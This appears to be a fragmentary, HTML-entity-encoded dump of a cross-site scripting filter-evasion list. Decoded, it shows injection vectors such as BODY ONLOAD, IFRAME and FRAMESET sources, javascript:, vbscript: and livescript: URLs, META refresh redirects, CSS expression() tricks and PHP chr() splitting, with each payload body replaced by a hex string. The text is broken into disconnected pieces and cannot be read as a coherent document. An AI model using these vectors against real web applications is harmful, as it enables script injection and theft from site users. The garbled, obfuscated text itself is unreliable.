8;&amp;#x62;&amp;#x38;&amp;#x2f;&amp;#x2f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7;&amp;#x33;&amp;#x64;&amp;#x63;&amp;#x33;&amp;#x33;&amp;#x37;&amp;#x30;&amp;#x38;&amp;#x65;&amp;#x37;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x33;&amp;#x63;&amp;#x31;&amp;#x38;&amp;#x63;&amp;#x32;&amp;#x63;&amp;#x32;&amp;#x34;&amp;#x63;&amp;#x65;&amp;#x66;&amp;#x63;&amp;#x61;&amp;#x36;&amp;#x34;&amp;#x62;&amp;#x65;&amp;#x39;&amp;#x27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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x39;&amp;#x35;&amp;#x61;&amp;#x66;&amp;#x33;&amp;#x64;&amp;#x36;&amp;#x64;&amp;#x64;&amp;#x61;&amp;#x37;&amp;#x35;&amp;#x30;&amp;#x38;&amp;#x61;&amp;#x37;&amp;#x31;&amp;#x63;&amp;#x65;&amp;#x66;&amp;#x62;&amp;#x36;&amp;#x38;&amp;#x31;&amp;#x63;&amp;#x35;&amp;#x30;&amp;#x66;&amp;#x30;&amp;#x31;&amp;#x65;&amp;#x65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e;&amp;#x50;&amp;#x55;&amp;#x54;&amp;#x20;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x49;&amp;#x4d;&amp;#x41;&amp;#x47;&amp;#x45;&amp;#x22;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x39;&amp;#x32;&amp;#x61;&amp;#x33;&amp;#x34;&amp;#x62;&amp;#x35;&amp;#x37;&amp;#x32;&amp;#x30;&amp;#x34;&amp;#x34;&amp;#x35;&amp;#x34;&amp;#x38;&amp;#x34;&amp;#x39;&amp;#x63;&amp;#x31;&amp;#x66;&amp;#x65;&amp;#x63;&amp;#x36;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x38;&amp;#x61;&amp;#x64;&amp;#x61;&amp;#x65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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x4f;&amp;#x4e;&amp;#x4c;&amp;#x4f;&amp;#x41;&amp;#x44;&amp;#x3d;&amp;#x30;&amp;#x39;&amp;#x66;&amp;#x31;&amp;#x32;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x64;&amp;#x65;&amp;#x39;&amp;#x64;&amp;#x30;&amp;#x64;&amp;#x61;&amp;#x62;&amp;#x39;&amp;#x64;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x35;&amp;#x32;&amp;#x65;&amp;#x37;&amp;#x34;&amp;#x64;&amp;#x63;&amp;#x63;&amp;#x37;&amp;#x65;&amp;#x6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44;&amp;#x59;&amp;#x4e;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x39;&amp;#x30;&amp;#x36;&amp;#x65;&amp;#x37;&amp;#x36;&amp;#x32;&amp;#x35;&amp;#x30;&amp;#x35;&amp;#x30;&amp;#x32;&amp;#x39;&amp;#x66;&amp;#x62;&amp;#x32;&amp;#x32;&amp;#x66;&amp;#x66;&amp;#x33;&amp;#x62;&amp;#x37;&amp;#x61;&amp;#x63;&amp;#x66;&amp;#x30;&amp;#x65;&amp;#x63;&amp;#x32;&amp;#x30;&amp;#x36;&amp;#x31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4c;&amp;#x4f;&amp;#x57;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x62;&amp;#x62;&amp;#x37;&amp;#x36;&amp;#x32;&amp;#x61;&amp;#x36;&amp;#x66;&amp;#x37;&amp;#x65;&amp;#x35;&amp;#x37;&amp;#x39;&amp;#x63;&amp;#x63;&amp;#x33;&amp;#x31;&amp;#x33;&amp;#x65;&amp;#x66;&amp;#x62;&amp;#x30;&amp;#x32;&amp;#x63;&amp;#x31;&amp;#x33;&amp;#x63;&amp;#x63;&amp;#x38;&amp;#x30;&amp;#x31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7;&amp;#x53;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x66;&amp;#x61;&amp;#x34;&amp;#x61;&amp;#x32;&amp;#x31;&amp;#x37;&amp;#x64;&amp;#x39;&amp;#x66;&amp;#x35;&amp;#x37;&amp;#x37;&amp;#x32;&amp;#x30;&amp;#x32;&amp;#x32;&amp;#x35;&amp;#x35;&amp;#x36;&amp;#x61;&amp;#x61;&amp;#x64;&amp;#x64;&amp;#x64;&amp;#x35;&amp;#x65;&amp;#x62;&amp;#x30;&amp;#x38;&amp;#x38;&amp;#x6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52;&amp;#x20;&amp;#x53;&amp;#x49;&amp;#x5a;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x26;&amp;#x7b;&amp;#x65;&amp;#x31;&amp;#x66;&amp;#x30;&amp;#x30;&amp;#x39;&amp;#x63;&amp;#x66;&amp;#x39;&amp;#x64;&amp;#x35;&amp;#x65;&amp;#x61;&amp;#x66;&amp;#x61;&amp;#x36;&amp;#x39;&amp;#x63;&amp;#x63;&amp;#x63;&amp;#x66;&amp;#x63;&amp;#x33;&amp;#x62;&amp;#x38;&amp;#x33;&amp;#x66;&amp;#x62;&amp;#x63;&amp;#x32;&amp;#x35;&amp;#x35;&amp;#x7d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c;&amp;#x49;&amp;#x4e;&amp;#x4b;&amp;#x20;&amp;#x52;&amp;#x45;&amp;#x4c;&amp;#x3d;&amp;#x22;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x65;&amp;#x65;&amp;#x74;&amp;#x22;&amp;#x20;&amp;#x48;&amp;#x52;&amp;#x45;&amp;#x46;&amp;#x3d;&amp;#x22;&amp;#x36;&amp;#x30;&amp;#x37;&amp;#x39;&amp;#x61;&amp;#x31;&amp;#x62;&amp;#x62;&amp;#x64;&amp;#x39;&amp;#x31;&amp;#x39;&amp;#x36;&amp;#x65;&amp;#x66;&amp;#x62;&amp;#x65;&amp;#x65;&amp;#x66;&amp;#x64;&amp;#x63;&amp;#x30;&amp;#x39;&amp;#x66;&amp;#x36;&amp;#x33;&amp;#x31;&amp;#x34;&amp;#x64;&amp;#x32;&amp;#x32;&amp;#x37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7;&amp;#x76;&amp;#x62;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x64;&amp;#x30;&amp;#x36;&amp;#x64;&amp;#x66;&amp;#x38;&amp;#x38;&amp;#x39;&amp;#x33;&amp;#x32;&amp;#x63;&amp;#x31;&amp;#x66;&amp;#x39;&amp;#x35;&amp;#x66;&amp;#x63;&amp;#x65;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x34;&amp;#x65;&amp;#x35;&amp;#x32;&amp;#x37;&amp;#x30;&amp;#x65;&amp;#x36;&amp;#x64;&amp;#x65;&amp;#x63;&amp;#x27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6d;&amp;#x6f;&amp;#x63;&amp;#x68;&amp;#x61;&amp;#x3a;&amp;#x5b;&amp;#x37;&amp;#x36;&amp;#x33;&amp;#x37;&amp;#x66;&amp;#x37;&amp;#x35;&amp;#x35;&amp;#x39;&amp;#x36;&amp;#x33;&amp;#x61;&amp;#x66;&amp;#x31;&amp;#x35;&amp;#x35;&amp;#x38;&amp;#x39;&amp;#x37;&amp;#x35;&amp;#x38;&amp;#x34;&amp;#x37;&amp;#x64;&amp;#x66;&amp;#x64;&amp;#x34;&amp;#x31;&amp;#x65;&amp;#x61;&amp;#x38;&amp;#x66;&amp;#x5d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6c;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x5b;&amp;#x61;&amp;#x39;&amp;#x37;&amp;#x30;&amp;#x31;&amp;#x36;&amp;#x35;&amp;#x30;&amp;#x30;&amp;#x38;&amp;#x61;&amp;#x61;&amp;#x32;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x36;&amp;#x36;&amp;#x64;&amp;#x30;&amp;#x39;&amp;#x34;&amp;#x61;&amp;#x66;&amp;#x64;&amp;#x31;&amp;#x32;&amp;#x32;&amp;#x39;&amp;#x64;&amp;#x63;&amp;#x5d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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x3b;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x3d;&amp;#x30;&amp;#x37;&amp;#x37;&amp;#x64;&amp;#x65;&amp;#x39;&amp;#x33;&amp;#x38;&amp;#x37;&amp;#x30;&amp;#x36;&amp;#x30;&amp;#x65;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x38;&amp;#x36;&amp;#x30;&amp;#x37;&amp;#x30;&amp;#x35;&amp;#x35;&amp;#x39;&amp;#x30;&amp;#x66;&amp;#x62;&amp;#x35;&amp;#x63;&amp;#x37;&amp;#x30;&amp;#x31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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x32;&amp;#x33;&amp;#x36;&amp;#x32;&amp;#x30;&amp;#x64;&amp;#x33;&amp;#x64;&amp;#x61;&amp;#x34;&amp;#x35;&amp;#x38;&amp;#x34;&amp;#x66;&amp;#x62;&amp;#x30;&amp;#x64;&amp;#x39;&amp;#x65;&amp;#x35;&amp;#x33;&amp;#x39;&amp;#x61;&amp;#x61;&amp;#x30;&amp;#x32;&amp;#x31;&amp;#x36;&amp;#x33;&amp;#x38;&amp;#x35;&amp;#x37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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x37;&amp;#x37;&amp;#x38;&amp;#x32;&amp;#x32;&amp;#x37;&amp;#x34;&amp;#x34;&amp;#x63;&amp;#x61;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x39;&amp;#x33;&amp;#x65;&amp;#x61;&amp;#x36;&amp;#x63;&amp;#x36;&amp;#x61;&amp;#x62;&amp;#x66;&amp;#x30;&amp;#x38;&amp;#x65;&amp;#x36;&amp;#x31;&amp;#x33;&amp;#x31;&amp;#x66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3e;&amp;#x3c;&amp;#x54;&amp;#x44;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x37;&amp;#x38;&amp;#x61;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x62;&amp;#x38;&amp;#x63;&amp;#x37;&amp;#x65;&amp;#x39;&amp;#x33;&amp;#x30;&amp;#x62;&amp;#x36;&amp;#x62;&amp;#x34;&amp;#x34;&amp;#x32;&amp;#x66;&amp;#x32;&amp;#x35;&amp;#x63;&amp;#x34;&amp;#x30;&amp;#x36;&amp;#x64;&amp;#x66;&amp;#x33;&amp;#x61;&amp;#x66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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x35;&amp;#x39;&amp;#x38;&amp;#x65;&amp;#x34;&amp;#x62;&amp;#x38;&amp;#x30;&amp;#x32;&amp;#x31;&amp;#x33;&amp;#x62;&amp;#x38;&amp;#x37;&amp;#x66;&amp;#x36;&amp;#x33;&amp;#x66;&amp;#x62;&amp;#x66;&amp;#x65;&amp;#x33;&amp;#x61;&amp;#x61;&amp;#x34;&amp;#x65;&amp;#x35;&amp;#x65;&amp;#x30;&amp;#x31;&amp;#x39;&amp;#x39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77;&amp;#x69;&amp;#x64;&amp;#x74;&amp;#x68;&amp;#x3a;&amp;#x20;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x30;&amp;#x36;&amp;#x32;&amp;#x31;&amp;#x34;&amp;#x38;&amp;#x39;&amp;#x66;&amp;#x35;&amp;#x62;&amp;#x39;&amp;#x64;&amp;#x38;&amp;#x65;&amp;#x36;&amp;#x61;&amp;#x39;&amp;#x35;&amp;#x65;&amp;#x35;&amp;#x66;&amp;#x38;&amp;#x65;&amp;#x63;&amp;#x64;&amp;#x36;&amp;#x39;&amp;#x39;&amp;#x62;&amp;#x30;&amp;#x39;&amp;#x36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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x37;&amp;#x64;&amp;#x62;&amp;#x62;&amp;#x37;&amp;#x39;&amp;#x36;&amp;#x66;&amp;#x30;&amp;#x37;&amp;#x33;&amp;#x33;&amp;#x31;&amp;#x65;&amp;#x37;&amp;#x35;&amp;#x61;&amp;#x39;&amp;#x35;&amp;#x35;&amp;#x65;&amp;#x62;&amp;#x37;&amp;#x31;&amp;#x64;&amp;#x36;&amp;#x61;&amp;#x36;&amp;#x32;&amp;#x32;&amp;#x34;&amp;#x61;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x49;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x4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f;&amp;#x20;&amp;#x2f;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x36;&amp;#x63;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x30;&amp;#x36;&amp;#x36;&amp;#x36;&amp;#x62;&amp;#x31;&amp;#x61;&amp;#x30;&amp;#x30;&amp;#x34;&amp;#x32;&amp;#x30;&amp;#x62;&amp;#x34;&amp;#x37;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x33;&amp;#x38;&amp;#x31;&amp;#x34;&amp;#x65;&amp;#x32;&amp;#x62;&amp;#x64;&amp;#x38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f;&amp;#x20;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x61;&amp;#x62;&amp;#x36;&amp;#x30;&amp;#x62;&amp;#x66;&amp;#x31;&amp;#x38;&amp;#x63;&amp;#x34;&amp;#x35;&amp;#x35;&amp;#x37;&amp;#x65;&amp;#x66;&amp;#x65;&amp;#x36;&amp;#x62;&amp;#x30;&amp;#x66;&amp;#x32;&amp;#x65;&amp;#x65;&amp;#x30;&amp;#x62;&amp;#x33;&amp;#x37;&amp;#x37;&amp;#x36;&amp;#x65;&amp;#x32;&amp;#x36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f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x66;&amp;#x61;&amp;#x64;&amp;#x63;&amp;#x66;&amp;#x65;&amp;#x35;&amp;#x31;&amp;#x30;&amp;#x31;&amp;#x33;&amp;#x62;&amp;#x39;&amp;#x34;&amp;#x37;&amp;#x65;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x38;&amp;#x37;&amp;#x32;&amp;#x32;&amp;#x31;&amp;#x63;&amp;#x30;&amp;#x63;&amp;#x66;&amp;#x33;&amp;#x32;&amp;#x66;&amp;#x34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0;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x66;&amp;#x35;&amp;#x65;&amp;#x33;&amp;#x33;&amp;#x32;&amp;#x66;&amp;#x34;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x37;&amp;#x33;&amp;#x63;&amp;#x63;&amp;#x62;&amp;#x62;&amp;#x62;&amp;#x31;&amp;#x38;&amp;#x38;&amp;#x65;&amp;#x31;&amp;#x37;&amp;#x38;&amp;#x30;&amp;#x35;&amp;#x34;&amp;#x32;&amp;#x64;&amp;#x34;&amp;#x39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2f;&amp;#x20;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x36;&amp;#x32;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x65;&amp;#x37;&amp;#x36;&amp;#x39;&amp;#x36;&amp;#x63;&amp;#x35;&amp;#x62;&amp;#x64;&amp;#x64;&amp;#x35;&amp;#x65;&amp;#x66;&amp;#x38;&amp;#x37;&amp;#x35;&amp;#x36;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x35;&amp;#x63;&amp;#x30;&amp;#x62;&amp;#x36;&amp;#x65;&amp;#x31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3c;&amp;#x3f;&amp;#x70;&amp;#x68;&amp;#x70;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x72;&amp;#x28;&amp;#x31;&amp;#x31;&amp;#x29;&amp;#x3f;&amp;#x3e;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x32;&amp;#x34;&amp;#x66;&amp;#x66;&amp;#x30;&amp;#x34;&amp;#x37;&amp;#x62;&amp;#x65;&amp;#x63;&amp;#x66;&amp;#x32;&amp;#x62;&amp;#x37;&amp;#x32;&amp;#x32;&amp;#x30;&amp;#x66;&amp;#x36;&amp;#x61;&amp;#x66;&amp;#x66;&amp;#x63;&amp;#x63;&amp;#x62;&amp;#x31;&amp;#x64;&amp;#x36;&amp;#x33;&amp;#x39;&amp;#x66;&amp;#x33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6;&amp;#x72;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x3c;&amp;#x3f;&amp;#x70;&amp;#x68;&amp;#x70;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x72;&amp;#x28;&amp;#x31;&amp;#x32;&amp;#x29;&amp;#x3f;&amp;#x3e;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x34;&amp;#x39;&amp;#x33;&amp;#x62;&amp;#x38;&amp;#x64;&amp;#x65;&amp;#x30;&amp;#x34;&amp;#x61;&amp;#x63;&amp;#x65;&amp;#x62;&amp;#x62;&amp;#x39;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x36;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x33;&amp;#x37;&amp;#x65;&amp;#x63;&amp;#x38;&amp;#x61;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x35;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x69;&amp;#x66;&amp;#x72;&amp;#x61;&amp;#x6d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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x53;&amp;#x45;&amp;#x54;&amp;#x3e;&amp;#x3c;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x66;&amp;#x38;&amp;#x30;&amp;#x62;&amp;#x33;&amp;#x35;&amp;#x31;&amp;#x63;&amp;#x63;&amp;#x64;&amp;#x66;&amp;#x64;&amp;#x30;&amp;#x61;&amp;#x38;&amp;#x33;&amp;#x36;&amp;#x63;&amp;#x61;&amp;#x66;&amp;#x66;&amp;#x32;&amp;#x39;&amp;#x36;&amp;#x34;&amp;#x37;&amp;#x30;&amp;#x37;&amp;#x64;&amp;#x64;&amp;#x35;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x53;&amp;#x45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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x32;&amp;#x31;&amp;#x31;&amp;#x35;&amp;#x33;&amp;#x34;&amp;#x62;&amp;#x63;&amp;#x31;&amp;#x66;&amp;#x62;&amp;#x64;&amp;#x66;&amp;#x39;&amp;#x39;&amp;#x62;&amp;#x34;&amp;#x32;&amp;#x66;&amp;#x63;&amp;#x64;&amp;#x62;&amp;#x63;&amp;#x63;&amp;#x61;&amp;#x62;&amp;#x33;&amp;#x66;&amp;#x31;&amp;#x38;&amp;#x62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4;&amp;#x41;&amp;#x42;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x3c;&amp;#x54;&amp;#x44;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x65;&amp;#x34;&amp;#x63;&amp;#x64;&amp;#x61;&amp;#x63;&amp;#x37;&amp;#x30;&amp;#x34;&amp;#x33;&amp;#x63;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x31;&amp;#x35;&amp;#x36;&amp;#x62;&amp;#x38;&amp;#x30;&amp;#x61;&amp;#x66;&amp;#x63;&amp;#x63;&amp;#x61;&amp;#x33;&amp;#x66;&amp;#x35;&amp;#x39;&amp;#x63;&amp;#x61;&amp;#x32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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x3b;&amp;#x38;&amp;#x38;&amp;#x63;&amp;#x63;&amp;#x66;&amp;#x61;&amp;#x63;&amp;#x34;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x34;&amp;#x31;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x30;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x31;&amp;#x38;&amp;#x37;&amp;#x37;&amp;#x32;&amp;#x39;&amp;#x30;&amp;#x31;&amp;#x33;&amp;#x36;&amp;#x33;&amp;#x32;&amp;#x2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77;&amp;#x69;&amp;#x64;&amp;#x74;&amp;#x68;&amp;#x3a;&amp;#x20;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x31;&amp;#x37;&amp;#x32;&amp;#x30;&amp;#x36;&amp;#x37;&amp;#x31;&amp;#x63;&amp;#x35;&amp;#x33;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x32;&amp;#x63;&amp;#x64;&amp;#x66;&amp;#x66;&amp;#x31;&amp;#x30;&amp;#x66;&amp;#x37;&amp;#x32;&amp;#x38;&amp;#x36;&amp;#x33;&amp;#x30;&amp;#x30;&amp;#x65;&amp;#x34;&amp;#x61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4;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x73;&amp;#x73;&amp;#x3a;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x2f;&amp;#x2a;&amp;#x33;&amp;#x65;&amp;#x62;&amp;#x30;&amp;#x33;&amp;#x30;&amp;#x32;&amp;#x66;&amp;#x31;&amp;#x35;&amp;#x37;&amp;#x65;&amp;#x35;&amp;#x37;&amp;#x35;&amp;#x30;&amp;#x34;&amp;#x30;&amp;#x31;&amp;#x37;&amp;#x33;&amp;#x34;&amp;#x61;&amp;#x37;&amp;#x61;&amp;#x37;&amp;#x66;&amp;#x39;&amp;#x64;&amp;#x62;&amp;#x31;&amp;#x30;&amp;#x2a;&amp;#x2f;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x33;&amp;#x65;&amp;#x62;&amp;#x30;&amp;#x33;&amp;#x30;&amp;#x32;&amp;#x66;&amp;#x31;&amp;#x35;&amp;#x37;&amp;#x65;&amp;#x35;&amp;#x37;&amp;#x35;&amp;#x30;&amp;#x34;&amp;#x30;&amp;#x31;&amp;#x37;&amp;#x33;&amp;#x34;&amp;#x61;&amp;#x37;&amp;#x61;&amp;#x37;&amp;#x66;&amp;#x39;&amp;#x64;&amp;#x62;&amp;#x31;&amp;#x30;&amp;#x2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3;&amp;#x36;&amp;#x66;&amp;#x62;&amp;#x64;&amp;#x65;&amp;#x39;&amp;#x64;&amp;#x30;&amp;#x30;&amp;#x35;&amp;#x33;&amp;#x32;&amp;#x61;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x38;&amp;#x61;&amp;#x35;&amp;#x62;&amp;#x36;&amp;#x64;&amp;#x36;&amp;#x32;&amp;#x30;&amp;#x32;&amp;#x37;&amp;#x38;&amp;#x62;&amp;#x32;&amp;#x61;&amp;#x20;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x73;&amp;#x73;&amp;#x3a;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x63;&amp;#x36;&amp;#x66;&amp;#x62;&amp;#x64;&amp;#x65;&amp;#x39;&amp;#x64;&amp;#x30;&amp;#x30;&amp;#x35;&amp;#x33;&amp;#x32;&amp;#x61;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x38;&amp;#x61;&amp;#x35;&amp;#x62;&amp;#x36;&amp;#x64;&amp;#x36;&amp;#x32;&amp;#x30;&amp;#x32;&amp;#x37;&amp;#x38;&amp;#x62;&amp;#x32;&amp;#x61;&amp;#x2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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x20;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x22;&amp;#x3e;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x30;&amp;#x32;&amp;#x62;&amp;#x33;&amp;#x31;&amp;#x39;&amp;#x65;&amp;#x65;&amp;#x61;&amp;#x37;&amp;#x63;&amp;#x37;&amp;#x31;&amp;#x36;&amp;#x39;&amp;#x32;&amp;#x39;&amp;#x66;&amp;#x32;&amp;#x31;&amp;#x32;&amp;#x66;&amp;#x33;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x33;&amp;#x32;&amp;#x32;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x4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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x2e;&amp;#x34;&amp;#x39;&amp;#x32;&amp;#x62;&amp;#x31;&amp;#x64;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x37;&amp;#x65;&amp;#x38;&amp;#x32;&amp;#x35;&amp;#x64;&amp;#x38;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x66;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x61;&amp;#x7b;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x34;&amp;#x39;&amp;#x32;&amp;#x62;&amp;#x31;&amp;#x64;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x37;&amp;#x65;&amp;#x38;&amp;#x32;&amp;#x35;&amp;#x64;&amp;#x38;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x66;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x61;&amp;#x22;&amp;#x29;&amp;#x3b;&amp;#x7d;&